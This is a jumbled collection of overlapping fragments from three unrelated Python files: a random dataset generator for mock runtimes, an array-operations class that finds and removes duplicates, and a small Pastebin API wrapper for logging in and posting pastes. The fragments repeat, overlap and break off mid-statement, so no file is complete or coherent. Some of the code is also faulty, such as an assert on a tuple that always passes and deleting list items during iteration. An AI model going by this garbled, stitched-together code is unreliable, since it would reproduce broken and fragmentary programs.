"s) argparse._ = gettext # to capitalize help headers base = os.path.basename(sys.argv[0]) name",
"= {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i = 0 for r in",
"type=float, help='''The upper bound. ''') opts = parser.parse_args() return opts def main(): '''",
"enable the use of the SND for analysis. $ {0} 8 115 125",
"cmpds. You can decorate the datasets with a header and record counts to",
"{}'.format(lineno, msg)) def err(msg, f=1): ''' Write an error message to stderr and",
"''') opts = parser.parse_args() return opts def main(): ''' Main entry point. '''",
"dataset that mocks runtimes between # 10 and 12 seconds with 2 decimal",
"err('lower bound {} must be less than upper bound {}'.format(lower, upper)) if opts.decorate:",
"124.312 122.044 # Example 3: generate a dataset that mocks runtimes between #",
"# Example 2: generate a dataset that mocks runtimes between # 115 and",
"# License: MIT Open Source # Copyright (c) 2016 by <NAME> import argparse",
"''' # License: MIT Open Source # Copyright (c) 2016 by <NAME> import",
"EXAMPLES: # Example 1: help $ {0} -h # Example 2: generate a",
"opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f =",
"1 10.30 2 11.48 3 10.50 4 10.25 5 10.52 6 11.34 '''.format(base)",
"and record counts to make them easier to read. That works because cmpds",
"= os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n",
"parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places. The default",
"3 118.571 4 120.238 5 124.852 6 119.652 7 116.400 8 122.446 #",
"message to stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1)",
"places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line",
"entry point. ''' opts = getopts() num = opts.num[0] lower = opts.lower[0] upper",
"of the SND for analysis. $ {0} -D 8 115 125 # date",
"= 6 # lower = 10.000 # upper = 12.000 # decimal places",
"# Typically you would want to generate at least 50 # elements to",
"'0.1' def generate_dataset(n, lower, upper): ''' Generate a datasets of n elements in",
"[OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: #",
"3 10.50 4 10.25 5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser",
"10.50 4 10.25 5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser =",
"= {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places",
"want to generate at least 50 elements to enable the use of the",
"that mocks runtimes between # 10 and 12 seconds with 2 decimal digits",
"file. Typically you would want to generate at least 50 elements to enable",
"dataset file. Typically you would want to generate at least 50 elements to",
"elements in the range [lower..upper]. A typical call might be something like: n",
"use of the standard normal distribution (SND) for analysis. ''' # License: MIT",
"2 11.48 3 10.50 4 10.25 5 10.52 6 11.34 '''.format(base) afc =",
"header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity.",
"action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level",
"125 seconds per run. # Typically you would want to generate at least",
"to enable the use of the SND for analysis. $ {0} 8 115",
"floating point numbers in a range for testing. It is used to create",
"<NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example"
] |
[
"dup_map[self._input[i]] = i def find_duplicates(self): dup_map = dict() for i in range(len(self._input)): if",
"range(len(self._input)): if self._input[i] in dup_map.keys(): del self._input[i] else: dup_map[self._input[i]] = i def find_duplicates(self):",
"dup_map.keys(): del self._input[i] else: dup_map[self._input[i]] = i def find_duplicates(self): dup_map = dict() for",
"def __init__(self, input_array:List[int] ): self._input = input_array def _validate_index(self, index): assert (index >",
"i in range(len(self._input)): if self._input[i] in dup_map.keys(): del self._input[i] else: dup_map[self._input[i]] = i",
"\"Index can't be greater than length\") def remove_at(self, index): self._validate_index(index) i = index",
"self._input[i+1] i+=1 self._input.pop(len(self._input)-1) def insert_at(self, index, data): self._validate_index(index) self._input[index] = data def remove_duplicates(self):",
"= len(self._input) while i+1 < length: self._input[i] = self._input[i+1] i+=1 self._input.pop(len(self._input)-1) def insert_at(self,",
"for i in range(len(self._input)): if self._input[i] in dup_map.keys(): del self._input[i] else: dup_map[self._input[i]] =",
"index): self._validate_index(index) i = index length = len(self._input) while i+1 < length: self._input[i]",
"in range(len(self._input)): if self._input[i] in dup_map: dup_map[self._input[i]] += 1 else: dup_map[self._input[i]] = 1",
"for i in range(len(self._input)): if self._input[i] in dup_map: dup_map[self._input[i]] += 1 else: dup_map[self._input[i]]",
"else: dup_map[self._input[i]] = i def find_duplicates(self): dup_map = dict() for i in range(len(self._input)):",
"in range(len(self._input)): if self._input[i] in dup_map.keys(): del self._input[i] else: dup_map[self._input[i]] = i def",
"insert_at(self, index, data): self._validate_index(index) self._input[index] = data def remove_duplicates(self): dup_map = dict() for",
"if self._input[i] in dup_map: dup_map[self._input[i]] += 1 else: dup_map[self._input[i]] = 1 return dup_map.keys()",
"import List class ArrayOps(object): def __init__(self, input_array:List[int] ): self._input = input_array def _validate_index(self,",
"assert (index > len(self._input), \"Index can't be greater than length\") def remove_at(self, index):",
"length\") def remove_at(self, index): self._validate_index(index) i = index length = len(self._input) while i+1",
"len(self._input) while i+1 < length: self._input[i] = self._input[i+1] i+=1 self._input.pop(len(self._input)-1) def insert_at(self, index,",
"def remove_duplicates(self): dup_map = dict() for i in range(len(self._input)): if self._input[i] in dup_map.keys():",
"_validate_index(self, index): assert (index > len(self._input), \"Index can't be greater than length\") def",
"self._input[i] = self._input[i+1] i+=1 self._input.pop(len(self._input)-1) def insert_at(self, index, data): self._validate_index(index) self._input[index] = data",
"than length\") def remove_at(self, index): self._validate_index(index) i = index length = len(self._input) while",
"i+=1 self._input.pop(len(self._input)-1) def insert_at(self, index, data): self._validate_index(index) self._input[index] = data def remove_duplicates(self): dup_map",
"be greater than length\") def remove_at(self, index): self._validate_index(index) i = index length =",
"= index length = len(self._input) while i+1 < length: self._input[i] = self._input[i+1] i+=1",
"> len(self._input), \"Index can't be greater than length\") def remove_at(self, index): self._validate_index(index) i",
"dup_map = dict() for i in range(len(self._input)): if self._input[i] in dup_map.keys(): del self._input[i]",
"in dup_map.keys(): del self._input[i] else: dup_map[self._input[i]] = i def find_duplicates(self): dup_map = dict()",
"__init__(self, input_array:List[int] ): self._input = input_array def _validate_index(self, index): assert (index > len(self._input),",
"data def remove_duplicates(self): dup_map = dict() for i in range(len(self._input)): if self._input[i] in",
"def find_duplicates(self): dup_map = dict() for i in range(len(self._input)): if self._input[i] in dup_map:",
"greater than length\") def remove_at(self, index): self._validate_index(index) i = index length = len(self._input)",
"length = len(self._input) while i+1 < length: self._input[i] = self._input[i+1] i+=1 self._input.pop(len(self._input)-1) def",
"typing import List class ArrayOps(object): def __init__(self, input_array:List[int] ): self._input = input_array def",
"del self._input[i] else: dup_map[self._input[i]] = i def find_duplicates(self): dup_map = dict() for i",
"= self._input[i+1] i+=1 self._input.pop(len(self._input)-1) def insert_at(self, index, data): self._validate_index(index) self._input[index] = data def",
"def insert_at(self, index, data): self._validate_index(index) self._input[index] = data def remove_duplicates(self): dup_map = dict()",
"= input_array def _validate_index(self, index): assert (index > len(self._input), \"Index can't be greater",
"find_duplicates(self): dup_map = dict() for i in range(len(self._input)): if self._input[i] in dup_map: dup_map[self._input[i]]",
"i = index length = len(self._input) while i+1 < length: self._input[i] = self._input[i+1]",
"): self._input = input_array def _validate_index(self, index): assert (index > len(self._input), \"Index can't",
"len(self._input), \"Index can't be greater than length\") def remove_at(self, index): self._validate_index(index) i =",
"self._input[i] else: dup_map[self._input[i]] = i def find_duplicates(self): dup_map = dict() for i in",
"from typing import List class ArrayOps(object): def __init__(self, input_array:List[int] ): self._input = input_array",
"i def find_duplicates(self): dup_map = dict() for i in range(len(self._input)): if self._input[i] in",
"self._validate_index(index) i = index length = len(self._input) while i+1 < length: self._input[i] =",
"= i def find_duplicates(self): dup_map = dict() for i in range(len(self._input)): if self._input[i]",
"self._validate_index(index) self._input[index] = data def remove_duplicates(self): dup_map = dict() for i in range(len(self._input)):",
"self._input.pop(len(self._input)-1) def insert_at(self, index, data): self._validate_index(index) self._input[index] = data def remove_duplicates(self): dup_map =",
"= dict() for i in range(len(self._input)): if self._input[i] in dup_map: dup_map[self._input[i]] += 1",
"range(len(self._input)): if self._input[i] in dup_map: dup_map[self._input[i]] += 1 else: dup_map[self._input[i]] = 1 return",
"index): assert (index > len(self._input), \"Index can't be greater than length\") def remove_at(self,",
"def _validate_index(self, index): assert (index > len(self._input), \"Index can't be greater than length\")",
"dup_map = dict() for i in range(len(self._input)): if self._input[i] in dup_map: dup_map[self._input[i]] +=",
"= data def remove_duplicates(self): dup_map = dict() for i in range(len(self._input)): if self._input[i]",
"dict() for i in range(len(self._input)): if self._input[i] in dup_map: dup_map[self._input[i]] += 1 else:",
"self._input[i] in dup_map.keys(): del self._input[i] else: dup_map[self._input[i]] = i def find_duplicates(self): dup_map =",
"length: self._input[i] = self._input[i+1] i+=1 self._input.pop(len(self._input)-1) def insert_at(self, index, data): self._validate_index(index) self._input[index] =",
"i in range(len(self._input)): if self._input[i] in dup_map: dup_map[self._input[i]] += 1 else: dup_map[self._input[i]] =",
"while i+1 < length: self._input[i] = self._input[i+1] i+=1 self._input.pop(len(self._input)-1) def insert_at(self, index, data):",
"self._input[index] = data def remove_duplicates(self): dup_map = dict() for i in range(len(self._input)): if",
"index, data): self._validate_index(index) self._input[index] = data def remove_duplicates(self): dup_map = dict() for i",
"= dict() for i in range(len(self._input)): if self._input[i] in dup_map.keys(): del self._input[i] else:",
"i+1 < length: self._input[i] = self._input[i+1] i+=1 self._input.pop(len(self._input)-1) def insert_at(self, index, data): self._validate_index(index)",
"List class ArrayOps(object): def __init__(self, input_array:List[int] ): self._input = input_array def _validate_index(self, index):",
"index length = len(self._input) while i+1 < length: self._input[i] = self._input[i+1] i+=1 self._input.pop(len(self._input)-1)",
"can't be greater than length\") def remove_at(self, index): self._validate_index(index) i = index length",
"dict() for i in range(len(self._input)): if self._input[i] in dup_map.keys(): del self._input[i] else: dup_map[self._input[i]]",
"input_array def _validate_index(self, index): assert (index > len(self._input), \"Index can't be greater than",
"< length: self._input[i] = self._input[i+1] i+=1 self._input.pop(len(self._input)-1) def insert_at(self, index, data): self._validate_index(index) self._input[index]",
"remove_at(self, index): self._validate_index(index) i = index length = len(self._input) while i+1 < length:",
"data): self._validate_index(index) self._input[index] = data def remove_duplicates(self): dup_map = dict() for i in",
"ArrayOps(object): def __init__(self, input_array:List[int] ): self._input = input_array def _validate_index(self, index): assert (index",
"(index > len(self._input), \"Index can't be greater than length\") def remove_at(self, index): self._validate_index(index)",
"def remove_at(self, index): self._validate_index(index) i = index length = len(self._input) while i+1 <",
"remove_duplicates(self): dup_map = dict() for i in range(len(self._input)): if self._input[i] in dup_map.keys(): del",
"input_array:List[int] ): self._input = input_array def _validate_index(self, index): assert (index > len(self._input), \"Index",
"if self._input[i] in dup_map.keys(): del self._input[i] else: dup_map[self._input[i]] = i def find_duplicates(self): dup_map",
"class ArrayOps(object): def __init__(self, input_array:List[int] ): self._input = input_array def _validate_index(self, index): assert",
"self._input = input_array def _validate_index(self, index): assert (index > len(self._input), \"Index can't be"
] |
[
"paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' :",
"used when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = {",
"requests, os # Precedence of Confidential Information: # Environment Variable > Function Argument",
"not in r.text: return r.text else: raise PasteError(r.text) class PasteError(Exception): def __init__(self, response):",
"Confidential Information: # Environment Variable > Function Argument > Constant Defined Here #",
"os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url =",
"the URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N',",
"\"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands within a file named \"keys\"",
"pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' :",
"raise PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response = response def __str__(self): return",
"key used when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data =",
"of Confidential Information: # Environment Variable > Function Argument > Constant Defined Here",
"r.text else: raise PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response = response def",
"with Pastebin with username and password # Returns: user_key, a session key used",
"__str__(self): return repr(self.response) # Authenticate with Pastebin with username and password # Returns:",
"r.status_code == 200 and 'Bad' not in r.text: return r.text else: raise PasteError(r.text)",
": paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url",
"= '' # Pastes code/text anonymously to Pastebin # Returns: paste_url, the URL",
"PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to Pastebin # Returns: paste_url, the",
"# Pastes code/text anonymously to Pastebin # Returns: paste_url, the URL containing the",
": paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data)",
"variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands within a file",
"Recommended: Set confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store",
"Pastebin Wrapper # By Optixal # Pastebin Documentation: https://pastebin.com/api import requests, os #",
"By Optixal # Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence of Confidential",
"os # Precedence of Confidential Information: # Environment Variable > Function Argument >",
"Variable > Function Argument > Constant Defined Here # Recommended: Set confidential information",
"= response def __str__(self): return repr(self.response) # Authenticate with Pastebin with username and",
"username and password # Returns: user_key, a session key used when pasting a",
"'api_user_key' : user_key, 'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date'",
"password # Returns: user_key, a session key used when pasting a non-guest paste",
"'Bad' not in r.text: return r.text else: raise PasteError(r.text) class PasteError(Exception): def __init__(self,",
": os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name'",
"Authenticate with Pastebin with username and password # Returns: user_key, a session key",
": paste_code, } url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code ==",
"non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key),",
"paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option'",
"user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password'",
"'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad' not in",
"option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format,",
"requests.post(url, data=data) if r.status_code == 200 and 'Bad' not in r.text: return r.text",
"user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name),",
"'' # Pastes code/text anonymously to Pastebin # Returns: paste_url, the URL containing",
"Pastebin # Returns: paste_url, the URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='',",
"Defined Here # Recommended: Set confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\".",
"else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response = response def __str__(self):",
"Information: # Environment Variable > Function Argument > Constant Defined Here # Recommended:",
"user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code == 200",
"'' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to Pastebin",
"os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url,",
": os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code",
"Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence of Confidential Information: # Environment",
"url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad'",
"= { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD',",
"# Recommended: Set confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can",
"\"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = ''",
"URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'):",
"confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\"",
"dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name,",
"r.text: return r.text else: raise PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response =",
"user_key, 'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date,",
"with username and password # Returns: user_key, a session key used when pasting",
"'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code",
"the \"export\" commands within a file named \"keys\" as well and run \"source",
"not in r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response):",
"paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' :",
"os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' :",
"anonymously to Pastebin # Returns: paste_url, the URL containing the paste def paste(paste_code,",
"dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY',",
"return r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response = response",
"as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands within",
"# Returns: paste_url, the URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste',",
"str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code,",
"in r.text: return r.text else: raise PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response",
"environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands within a",
"Function Argument > Constant Defined Here # Recommended: Set confidential information as environment",
"containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data",
": user_key, 'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' :",
": str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' :",
"user_key, a session key used when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME,",
"user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data)",
"data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' :",
"'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code'",
"# Environment Variable > Function Argument > Constant Defined Here # Recommended: Set",
"can store the \"export\" commands within a file named \"keys\" as well and",
"'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r",
"{ 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password),",
"= '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to",
"paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = {",
"PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response = response def __str__(self): return repr(self.response)",
"Precedence of Confidential Information: # Environment Variable > Function Argument > Constant Defined",
"200 and 'Bad' not in r.text: return r.text else: raise PasteError(r.text) class PasteError(Exception):",
"data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option,",
"paste_code, } url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code == 200",
"information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands",
"within a file named \"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY =",
"store the \"export\" commands within a file named \"keys\" as well and run",
": paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r",
"Set confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the",
"the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data =",
"= 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad' not",
"Here # Recommended: Set confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You",
"paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name'",
"} url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code == 200 and",
"r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response =",
"url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad'",
"self.response = response def __str__(self): return repr(self.response) # Authenticate with Pastebin with username",
"def __init__(self, response): self.response = response def __str__(self): return repr(self.response) # Authenticate with",
"as well and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD",
"Returns: paste_url, the URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0,",
"Constant Defined Here # Recommended: Set confidential information as environment variables with \"export",
"response def __str__(self): return repr(self.response) # Authenticate with Pastebin with username and password",
"return r.text else: raise PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response = response",
"in r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response",
"user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key),",
"# Authenticate with Pastebin with username and password # Returns: user_key, a session",
"You can store the \"export\" commands within a file named \"keys\" as well",
"raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response = response def __str__(self): return",
"= { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private'",
"response): self.response = response def __str__(self): return repr(self.response) # Authenticate with Pastebin with",
"a session key used when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>):",
"os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code ==",
"'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad' not in",
"Documentation: https://pastebin.com/api import requests, os # Precedence of Confidential Information: # Environment Variable",
"'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private' : str(paste_private),",
"code/text anonymously to Pastebin # Returns: paste_url, the URL containing the paste def",
"def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' :",
"commands within a file named \"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY",
"PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to Pastebin #",
"== 200 and 'Bad' not in r.text: return r.text else: raise PasteError(r.text) class",
"to Pastebin # Returns: paste_url, the URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY,",
"repr(self.response) # Authenticate with Pastebin with username and password # Returns: user_key, a",
"r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response = response def",
"Returns: user_key, a session key used when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY,",
": option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' :",
"dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php'",
"login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME',",
"'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r = requests.post(url,",
"'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if",
"data=data) if r.status_code == 200 and 'Bad' not in r.text: return r.text else:",
"'' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to Pastebin # Returns: paste_url,",
"session key used when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data",
"Wrapper # By Optixal # Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence",
"and password # Returns: user_key, a session key used when pasting a non-guest",
"# Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence of Confidential Information: #",
"'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), }",
"PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands within a file named \"keys\" as",
"= 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad' not",
"#!/usr/bin/python3 # Light Pastebin Wrapper # By Optixal # Pastebin Documentation: https://pastebin.com/api import",
"class PasteError(Exception): def __init__(self, response): self.response = response def __str__(self): return repr(self.response) #",
"when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key'",
"paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key,",
"Pastebin with username and password # Returns: user_key, a session key used when",
"'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, }",
"and 'Bad' not in r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception): def",
"a file named \"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY = ''",
"# Returns: user_key, a session key used when pasting a non-guest paste def",
"200 and 'Bad' not in r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception):",
"paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' :",
"'Bad' not in r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self,",
"Environment Variable > Function Argument > Constant Defined Here # Recommended: Set confidential",
